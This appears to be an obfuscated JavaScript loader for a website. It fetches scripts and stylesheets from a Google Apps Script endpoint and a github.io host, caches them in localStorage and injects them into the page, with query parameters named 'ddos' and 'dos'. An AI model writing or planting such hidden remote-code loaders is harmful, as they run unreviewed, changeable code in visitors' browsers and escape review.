var _a=["createElement","script","async","remove","getElementsByTagName","createTextNode","appendChild","head","src","lg","onreadystatechange","readyState","status","responseText","e",".",";","split","shift","","join","stringify","setItem","GET","open","send","ms","md","me","getTime","a.start","a.google","var googles = {ms:",",md:","};","1","/exec?","indexOf","&ddos=","floor","&dos=","&end=","object","getItem","&end=0","ceil","-","removeItem",".css","style","parse","version","content","c"],alo=
{ms:0,md:0,me:0,e:function(a,c,f){f=document[_a[0]](c);_a[1]==c&&(f[_a[2]]=!0,setTimeout(function(){document[_a[4]](_a[1])[0][_a[3]]()},500));a=document[_a[5]](a);f[_a[6]](a);document[_a[4]](_a[7])[0][_a[6]](f)},c:function(a,c,f,g,d,e){d=void 0===d?null:d;e=void 0===e?null:e;var b=new XMLHttpRequest;e&&(sow[_a[8]]=a,$[_a[9]](1));b[_a[10]]=function(){if(4==b[_a[11]]&&200==b[_a[12]]){e&&$[_a[9]](0);var a=b[_a[13]];
alo[_a[14]](a,g,e);d&&d();_a[15]==a[3]&&(a=a[_a[17]](_a[16]),a[_a[18]](),a=a[_a[20]](_a[19]));localStorage[_a[22]](c,JSON[_a[21]]({content:a,version:f}))}};b[_a[24]](_a[23],a,!0);b[_a[25]]()},p:function(a,c){this[_a[26]]=a;this[_a[27]]=c;this[_a[28]]=(new Date)[_a[29]]();localStorage[_a[22]](_a[30],this[_a[28]]);localStorage[_a[22]](_a[31],JSON[_a[21]]({content:_a[32]+a+_a[33]+c+
_a[34],version:_a[35]}))},$:function(a,c,f,g,d,e){g=void 0===g?null:g;d=void 0===d?null:d;e=void 0===e?null:e;if(0<a[_a[37]](_a[36])&&0>a[_a[37]](_a[38]))if(0!=this[_a[26]]){var b=Math[_a[39]](((new Date)[_a[29]]()-this[_a[28]])/1E3);this.$(a+_a[38]+(this[_a[26]]+b)+_a[40]+this[_a[27]]+_a[41]+b,c,f,g,d,e)}else var m=setInterval(function(){if(_a[42]==typeof googles){clearInterval(m);var b=localStorage[_a[43]](_a[30]);
null!=b&&(alo[_a[28]]=(new Date)[_a[29]](),alo[_a[26]]=googles[_a[26]]+Math[_a[39]]((alo[_a[28]]-+b)/1E3),alo[_a[27]]=7*(alo[_a[26]]-173472337),alo.$(a+_a[38]+alo[_a[26]]+_a[40]+alo[_a[27]]+_a[44],c,f,g,d,e))}},100);else{var b=Math[_a[45]]((new Date)[_a[29]]()/1E3),k=localStorage;if(g&&0!=g){var l=0,h;for(h in k)if(0==h[_a[37]](c)){0==h[_a[37]](c+_a[46])?l=h:k[_a[47]](h);break}0!=l?(h=l[_a[17]](_a[46]),
h=+h[1],h<b?(k[_a[47]](l),c+=_a[46]+(b+ +g)):c=l):c+=_a[46]+(b+ +g)}b=k[_a[43]](c);k=0<a[_a[37]](_a[48])?_a[49]:_a[1];null!=b&&null!=f?(l=JSON[_a[50]](b),l[_a[51]]==f?(this[_a[14]](l[_a[52]],k,e),d&&d()):(localStorage[_a[47]](b),this[_a[53]](a,c,f,k,d,e))):this[_a[53]](a,c,f,k,d,e)}}};

alo.$('https://script.google.com/macros/s/AKfycbxBh5ptSSej3stcLyB1k_oIuVXuKvGLzsdc7LFL2I4xe4APdaA/exec','a.google','1',null,function(){alo.p(googles.ms,googles.md)});
alo.$('https://rongnano.github.io/file/js.js','a.js','1');
alo.$('https://rongnano.github.io/file/style.css','a.css','1');

